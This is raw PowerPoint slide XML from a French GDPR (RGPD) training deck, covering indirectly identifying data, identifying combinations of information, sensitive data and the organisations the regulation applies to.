          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800102" y="960594"/>
            <a:ext cx="5828114" cy="4936812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" dirty="0"/>
              <a:t>Généralités</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="5400" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA98CE3-81A7-4FFE-A047-9AA65998D8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315200" y="1733549"/>
            <a:ext cx="0" cy="339090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CB168234-A469-4822-AFD0-DACF9AD0001C}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278123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49C99A08-B528-48B3-8C7E-F1D5ABDB7A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34862" y="2408346"/>
            <a:ext cx="5026071" cy="4161587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="11256422" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Des données </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indirectement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> identifiantes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695324" y="2408346"/>
            <a:ext cx="7684883" cy="1471107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>L’association d’une donnée avec un élément d’une autre base de données permet de retrouver l’identité de la personne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Données type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>: n° client, n° de téléphone, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC011688-1DE4-437E-86CF-E86D4794175D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="3988011"/>
            <a:ext cx="6254116" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Où trouver ces données ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"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fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pseudo sur un réseau social</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Données biométriques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Numéro de sécurité sociale (NIR)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408761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49C99A08-B528-48B3-8C7E-F1D5ABDB7A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34862" y="2408346"/>
            <a:ext cx="5026071" cy="4161587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="11256422" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Toutes les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combinaisons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> d’informations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695324" y="2408346"/>
            <a:ext cx="7684883" cy="1471107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>L’association de plusieurs données formant un caractère unique permettant de remonter à l’identité de la personne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Données type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>: n° client, n° de téléphone, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC011688-1DE4-437E-86CF-E86D4794175D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="3988011"/>
            <a:ext cx="6254116" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Où trouver ces données ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"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fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Loisirs &amp; activités</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Date &amp; Lieu de naissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nom de l’employeur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lieu de résidence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186678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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24"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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="11256422" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>LES Données dites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensibles</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695324" y="2408346"/>
            <a:ext cx="10326244" cy="1471107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Ce sont des informations qui révèlent la prétendue orientation sexuelle, origine raciale ou ethnique, les opinions politiques, les convictions religieuses ou philosophiques ou l'appartenance syndicale.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC011688-1DE4-437E-86CF-E86D4794175D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="3988010"/>
            <a:ext cx="7473316" cy="1697901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le traitement des données sensibles est autorisé dans certains cas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pour avoir lieu, l’individu doit donner son consentement écrit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Répond à des principes de licéité, loyauté, transparence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exception faite, si le traitement est d’intérêt vital.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAC3226-5AD3-4F8D-8DA8-A8C19BF40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74987" y="3625175"/>
            <a:ext cx="2551661" cy="3487103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{763ADA8B-319A-4DC0-93DC-FE1DE76A14D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249757" y="3976249"/>
            <a:ext cx="1174511" cy="2110470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345889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fade">
                                      <p:cBhvr>
                                        <p:cTn id="3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49C99A08-B528-48B3-8C7E-F1D5ABDB7A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89080" y="2710035"/>
            <a:ext cx="5202920" cy="4161587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897753"/>
            <a:ext cx="10896041" cy="1575391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les organismes concernés par l’application du RGPD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695323" y="2710035"/>
            <a:ext cx="5995933" cy="3500265"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TOUS LES ORGANISMES PUBLICS &amp; PRIVES </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les entreprises (TPE, PME, ETI et GE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les administrations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les collectivités</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les associations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203117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e 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC557731-45C4-44D6-AE8B-C4D163AA0EC9}"/>
